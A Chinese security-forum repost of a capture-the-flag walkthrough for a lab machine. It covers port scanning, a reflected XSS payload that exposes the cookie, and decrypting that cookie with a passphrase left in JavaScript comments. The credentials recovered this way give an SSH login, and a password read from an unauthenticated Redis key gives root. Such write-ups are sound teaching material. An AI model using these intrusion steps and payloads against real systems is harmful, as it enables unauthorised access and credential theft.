安全矩阵

 找回密码
 立即注册
搜索
查看: 835|回复: 0

打靶总结-过程及思路系列15

[复制链接]

251

主题

270

帖子

1797

积分

金牌会员

Rank: 6Rank: 6

积分
1797
发表于 2023-4-2 21:10:14 | 显示全部楼层 |阅读模式
转于:安全牛课堂 2023-03-31 17:00 发表于河北

1
靶机目标
root权限+2个flag

2
详细步骤
一、主机发现



sudo arp-scan -l

二、端口扫描

sudo nmap -p- 10.0.0.20sudo nmap -p22,80 -sC -sV 10.0.0.20


三、Web信息收集
浏览器访问http://10.0.0.20


点击其中一个图片


再次点击图片,发现一个id参数


测试是否存在SQL注入、文件包含漏洞,均不成功,只是回显输入信息








测试是否存在反射型XSS漏洞,确实存在
http://10.0.0.20/opus-details.php?id=<script>alert(1)</script>


可以弹出Cookie
http://10.0.0.20/opus-details.php?id=<script>alert(document.cookie)</script>




cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt
经Base64解码以后得到是一串加了“盐”的内容



echo -n "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt" | base64 -dSalted__w�3�:�lw��U�w��bJ                         ��=+�j▒�:3�7U[&m
尝试目录爆破,发现一个js目录



sudo dirsearch -u http://10.0.0.20

尝试访问js目录下的文件


通过阅读js文件中的注释文件得知:
●crypto-js可能是js的加密套件
●SecretPassphraseMomentum可能是解密密钥

function viewDetails(str) {
  window.location.href = "opus-details.php?id="+str;}
/*var CryptoJS = require("crypto-js");var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");console.log(decrypted.toString(CryptoJS.enc.Utf8));*/
查询crypto-js使用手册crypto-js: CryptoJS (crypto.js) 为 JavaScript 提供了各种各样的加密算法,得知AES加解密的操作代码,确信了解密密钥。


使用Crypto-JS在线解密工具在线加密解密获得如下信息:




auxerre-alienum##
用该信息ssh远程连接靶机,登录成功

auxerreauxerre-alienum##

四、主机信息收集
获取flag1



pwdlscat user.txt

主机信息收集



uname -alsb_release -asudo -l



搜索利用代码



searchsploit 4.19

但经测试,这4个脚本都无法提权成功
尝试其他信息收集,发现靶机内存在redis用户,但redis数据库在安全性上一直比较薄弱,默认安装完成后默认监听6379端口,可以非授权访问



cat /etc/passwd

查看系统开放端口和进程情况,确认靶机确实运行了redis数据库

ss -pantups -aux | grep redis


五、Redis数据库信息收集
连接本机redis数据库



redis-cli

测试redis数据库是否启用身份证认证,若未启用则直接输出打印相关信息



info

且数据库中存在数据一个“键值对”


查询keys“键”名称

KEYS *rootpass

查询keys中的“值”

GET rootpassm0mentum-al1enum##

退出数据库



exit
六、Root su提权



sum0mentum-al1enum##id

获取flag2



cat /root/root.txt

相关阅读:


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 21:35 , Processed in 0.014177 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表